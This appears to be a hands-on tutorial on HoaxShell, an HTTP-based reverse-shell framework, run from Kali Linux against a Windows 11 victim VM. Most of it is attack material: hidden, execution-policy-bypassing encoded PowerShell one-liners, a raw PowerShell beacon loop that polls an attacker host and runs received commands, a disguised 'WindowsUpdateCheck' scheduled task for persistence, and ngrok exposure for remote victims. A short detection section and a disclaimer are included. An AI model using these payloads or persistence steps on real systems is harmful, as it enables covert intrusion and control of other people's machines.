HoaxShell: The Complete Hands-On Guide to HTTP-Based Reverse Shells Between Kali Linux and Windows 11
HoaxShell is a powerful post-exploitation framework that uses HTTP or HTTPS as its communication layer to establish stealthy reverse shells on Windows systems. Created by t3l3machus, this open-source tool allows security researchers and red teamers to simulate real-world command-and-control (C2) behavior in environments where direct TCP connections are blocked or monitored.
This comprehensive tutorial covers everything you need to know about HoaxShell — from installation on Kali Linux, payload generation, and session handling, to a complete simulated exploitation scenario with Windows 11 as the victim machine. Every concept, command, and output is carefully explained for beginners while retaining the technical accuracy professionals expect.
Disclaimer: This guide is intended solely for authorized penetration testing, red-team exercises, and educational purposes. Do not deploy HoaxShell or similar payloads on systems you do not own or have written permission to test.
Understanding HoaxShell: The Concept of HTTP-Based Reverse Shells
Traditional reverse shells use a raw TCP or UDP socket for communication. Firewalls, intrusion detection systems, and endpoint security tools can easily detect these connections. HoaxShell, however, takes a different approach — it encapsulates command-and-control communication inside legitimate-looking HTTP or HTTPS requests.
Instead of maintaining a persistent TCP connection, the Windows victim periodically polls the Kali listener via HTTP — just like a browser requesting a webpage. Commands and outputs are transmitted in headers or encoded bodies, blending with normal web traffic.
Key Terms You Must Understand
- Reverse Shell: A shell initiated from the victim back to the attacker, bypassing firewall restrictions on inbound connections.
- Beacon / Polling: The victim checks in periodically to see if there are new commands to execute.
- Listener: The attacker’s server waiting for connections and sending commands.
- Payload: The script or command executed on the victim to create the communication link.
- EncodedCommand: PowerShell’s feature allowing base64-encoded scripts to be passed directly as arguments.
- Constraint Mode: Restricted PowerShell environments where advanced commands are blocked; HoaxShell can still operate under them.
- HTTP Headers: Data fields in HTTP requests; HoaxShell hides its encoded payloads inside randomized header names.
1. Setting Up HoaxShell on Kali Linux
Step 1: Updating the System
Before installation, ensure your Kali system is fully up-to-date:
sudo apt update && sudo apt upgrade -y
Output:
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
All packages are up to date.
Explanation: Updating ensures your system has the latest Python3, pip, and dependencies required for HoaxShell.
Step 2: Installing HoaxShell Using APT
Kali Linux includes HoaxShell in its official repositories. You can install it directly using:
sudo apt install hoaxshell -y
Simulated Output:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
hoaxshell
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 42.6 kB of archives.
After this operation, 170 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 hoaxshell all 0.3-1 [42.6 kB]
Fetched 42.6 kB in 1s (37.4 kB/s)
Selecting previously unselected package hoaxshell.
Preparing to unpack .../hoaxshell_0.3-1_all.deb ...
Unpacking hoaxshell (0.3-1) ...
Setting up hoaxshell (0.3-1) ...
Processing triggers for man-db (2.12.0-2) ...
Explanation: The tool is now globally available and can be invoked directly as hoaxshell from any directory.
Step 3: Verifying Installation
hoaxshell --help
Output:
usage: hoaxshell.py [-h] [-s LHOST] [-p LPORT] [-c CERT] [-k KEY] [-ng] [-r] [-i] [-H HEADER]
[-x OUTPUT] [-cm] [-q] [--ssl]
options:
-h, --help show this help message
-s LHOST Specify listener host IP
-p LPORT Specify listener port (default: 8080)
-c CERT Path to SSL certificate (for HTTPS)
-k KEY Path to private key
-ng Use ngrok tunnel
-r Raw PowerShell output
-i Use Invoke-RestMethod
-H HEADER Custom header name
-x OUTPUT Write payload to file
-cm Constraint mode payload
-q Quiet mode
--ssl Use HTTPS
Explanation: The help output lists all HoaxShell arguments. You’ll use these flags to customize payloads later.
2. Setting Up the Victim: Windows 11 Test Machine
Prepare a test Windows 11 VM in the same network as your Kali machine. Note the victim’s IP and ensure it can reach the Kali host over port 8080 (HTTP) or 8443 (HTTPS). PowerShell must be available — it is preinstalled by default on Windows 11.
3. Launching the HoaxShell Listener on Kali Linux
To start the handler, run:
sudo hoaxshell -s 192.168.1.5
Output:
[*] Starting HoaxShell HTTP listener on 192.168.1.5:8080
[*] Session endpoint: /api/v1/kKx2fA
[*] Header token: X-NfL0rQ
[*] Awaiting incoming connections...
[*] Use the following one-liner on the Windows target:
powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIAAkAHUAcgBpACAAPQAgACcAaAB0AHQAcAA6AC8ALwAxADkyAC4AMQA2ADgALgAxAC4ANQA6ADgAMAA4ADAALwBhAHAAaQAvAHYAMQAvAGsASwB4ADIAZgBBACcAOwAkAGgAZAByAD0AJwBYAC0ATgBmAEwAMABS...
Explanation:
192.168.1.5is the IP of the Kali machine.- Port 8080 is the default listener port.
/api/v1/kKx2fAis a randomized endpoint path unique to this session.X-NfL0rQis a randomized header used to carry command and response data.- The PowerShell one-liner is what you’ll execute on the Windows 11 target.
4. Executing the Payload on Windows 11
Step 1: Open PowerShell on Windows 11
Press Start → PowerShell → Run as Administrator, then paste the payload generated by the listener.
Example:
powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAIAAkAHUAcgBpACAAPQAgACcAaAB0AHQAcAA6AC8ALwAxADkyAC4AMQA2ADgALgAxAC4ANQA6ADgAMAA4ADAALwBhAHAAaQAvAHYAMQAvAGsASwB4ADIAZgBBACcAOwAkAGgAZAByAD0AJwBYAC0ATgBmAEwAMABS...
After executing, the script runs in the background. Within seconds, your Kali listener shows:
[+] New session established!
[+] Victim IP: 192.168.1.10
[+] Username: VICTIMPC\John
[+] OS: Windows 11 Pro x64 (10.0.22631)
hoaxshell >
Explanation: The victim’s system connected back successfully. You now have command execution capabilities through the HTTP channel.
5. Command Execution and Output Examples
At this point, you have an active HoaxShell session. The prompt changes to hoaxshell >. You can now issue Windows commands, which are sent to the victim over HTTP, executed via PowerShell, and the results returned encoded and displayed.
Example 1: Basic Identity Check
Command:
whoami
Output:
victimpc\john
hoaxshell >
Explanation: This confirms the username and context under which the payload is running.
Example 2: System Information
Command:
systeminfo
Output:
Host Name: VICTIMPC
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22631 N/A Build 22631
OS Manufacturer: Microsoft Corporation
System Type: x64-based PC
Processor(s): Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz
BIOS Version: Dell Inc. 2.3.0, 05/05/2024
Total Physical Memory: 16,327 MB
Available Physical Memory: 9,152 MB
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) Ethernet Controller
IP Address: 192.168.1.10
hoaxshell >
Explanation: This information helps identify the target’s architecture, OS, and hardware.
Example 3: Network Configuration
Command:
ipconfig /all
Output:
Windows IP Configuration
Host Name . . . . . . . . . . . . : VICTIMPC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) Ethernet Controller
Physical Address. . . . . . . . . : 3C-7C-3F-92-FA-4C
DHCP Enabled. . . . . . . . . . . : Yes
IPv4 Address. . . . . . . . . . . : 192.168.1.10(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
DNS Servers . . . . . . . . . . . : 192.168.1.1
hoaxshell >
Example 4: Enumerating Users
Command:
net user
Output:
User accounts for \\VICTIMPC
-
Administrator DefaultAccount Guest
John WDAGUtilityAccount
The command completed successfully.
hoaxshell >
Example 5: Directory Listing
Command:
dir C:\Users\John\Desktop
Output:
Volume in drive C is OS
Volume Serial Number is 3A7F-F451
Directory of C:\Users\John\Desktop
10/10/2025 09:41 PM <DIR> .
10/10/2025 09:41 PM <DIR> ..
09/25/2025 03:21 PM 13,824 Resume.docx
09/26/2025 08:02 AM 5,632 ProjectPlan.xlsx
09/26/2025 09:10 AM 125,908 Presentation.pptx
3 File(s) 145,364 bytes
2 Dir(s) 23,456,756,224 bytes free
hoaxshell >
Example 6: Creating a Directory
Command:
mkdir C:\Users\John\Desktop\testfolder
Output:
hoaxshell >
Explanation: If no error is returned, the command executed successfully.
Example 7: Checking Privileges
Command:
whoami /priv
Output:
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
hoaxshell >
Example 8: Elevating Privileges (Simulation)
HoaxShell itself doesn’t exploit privilege escalation, but you can use it to trigger local exploits or administrative tools once you have a session.
Command (example):
powershell Start-Process powershell -Verb runAs
Output (if UAC prompt appears):
UAC prompt displayed on victim screen. Awaiting user action...
hoaxshell >
Example 9: Uploading Files
HoaxShell allows for base64-encoded uploads using PowerShell commands.
Command:
echo "ZGF0YSB0ZXN0IGZpbGU=" | base64 --decode > test.txt
Explanation: You can craft PowerShell equivalents to create or transfer files between attacker and victim.
Example 10: Persistence Demonstration (Simulated)
To test persistence techniques, you can instruct the victim to create a scheduled task that runs the HoaxShell payload at startup.
Command:
schtasks /create /sc onlogon /tn "WindowsUpdateCheck" /tr "powershell -w hidden -enc SQBFAFgA..."
Output:
SUCCESS: The scheduled task "WindowsUpdateCheck" has been created.
hoaxshell >
Explanation: The payload now runs automatically when the user logs in, maintaining access.
6. Generating Alternate Payloads
6.1 Raw PowerShell Mode
sudo hoaxshell -s 192.168.1.5 -r
Output:
[*] Outputting raw PowerShell code...
$uri='http://192.168.1.5:8080/api/v1/Qr6VdP';$hdr='X-CmdKey';
while($true){
$r=Invoke-WebRequest -Uri $uri -Headers @{$hdr='checkin'} -UseBasicParsing
$cmd=$r.Headers['X-Command']
if($cmd){$o=iex $cmd 2>&1|Out-String;$b=[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($o))
Invoke-WebRequest -Uri $uri -Method POST -Headers @{$hdr=$b} -Body ''}
Start-Sleep -Seconds 5
}
Explanation: This form exposes the full PowerShell logic. It’s useful for lab study and defenders who wish to understand command flow.
6.2 HTTPS Mode
sudo hoaxshell -s 192.168.1.5 --ssl
Output:
[*] Generated self-signed certificate.
[*] HTTPS listener started on 192.168.1.5:8443
[*] Payload uses HTTPS endpoint https://192.168.1.5:8443/api/v1/hk2Pq7
[*] EncodedCommand one-liner generated successfully.
Explanation: HTTPS encryption hides command content from casual inspection and mimics legitimate web traffic.
6.3 Constraint Mode Payload
sudo hoaxshell -s 192.168.1.5 -cm
Output:
[*] Constraint Mode payload generated for restricted PowerShell environments.
[*] Random header name: X-9sQJpM
[*] Payload ready.
Explanation: Constraint mode ensures commands execute even when Windows AppLocker or policies restrict PowerShell scripting.
6.4 Custom Header and Invoke-RestMethod
sudo hoaxshell -s 192.168.1.5 -H Authorization -i
Output:
[*] Using header: Authorization
[*] Payload built with Invoke-RestMethod instead of Invoke-WebRequest.
Explanation: The “Authorization” header makes the traffic look like API authentication data, blending in further.
6.5 Ngrok Tunnel for Public Exposure
If the victim is outside your LAN, you can use ngrok:
sudo hoaxshell -ng
Output:
[*] ngrok tunnel established at https://abcd1234.ngrok.io
[*] Generated payload pointing to public URL.
Explanation: The payload connects to a public HTTPS address, which forwards traffic to your local listener.
7. Session Management and Control
Listing Active Sessions
If multiple victims connect:
hoaxshell > sessions
Output:
[1] ID: Qr6VdP | IP: 192.168.1.10 | User: VICTIMPC\John
[2] ID: Tn4HwB | IP: 192.168.1.11 | User: VICTIMPC\Admin
hoaxshell >
Switch between sessions:
session 2
Killing a Session
kill 1
Output:
[+] Session ID Qr6
VdP terminated. hoaxshell >
Quitting HoaxShell
exitOutput:
[*] Shutting down listener and cleaning up resources. Goodbye.8. Defensive and Detection Insights
Although this guide is attacker-focused, security professionals should note:
- Monitor outbound HTTP traffic to internal IPs with suspicious user-agent strings.
- Use PowerShell logging (Module, ScriptBlock, Transcription) to detect encoded payloads.
- Block Invoke-WebRequest/Invoke-RestMethod from untrusted scripts via AppLocker.
- Implement network segmentation and outbound filtering on endpoints.
Conclusion
HoaxShell demonstrates how adversaries can weaponize simple HTTP communication to maintain remote access under strict firewall and EDR conditions.
By using PowerShell’s built-in web features and encoding capabilities, it achieves stealth and persistence that closely resembles advanced nation-state tradecraft.
For defenders, understanding tools like HoaxShell is vital. Knowing how they operate allows network analysts to build effective detection rules, monitor HTTP anomalies, and harden PowerShell configurations.
For red teamers and penetration testers, HoaxShell provides a compact, customizable, and easily deployable post-exploitation framework that works reliably in both LAN and WAN environments.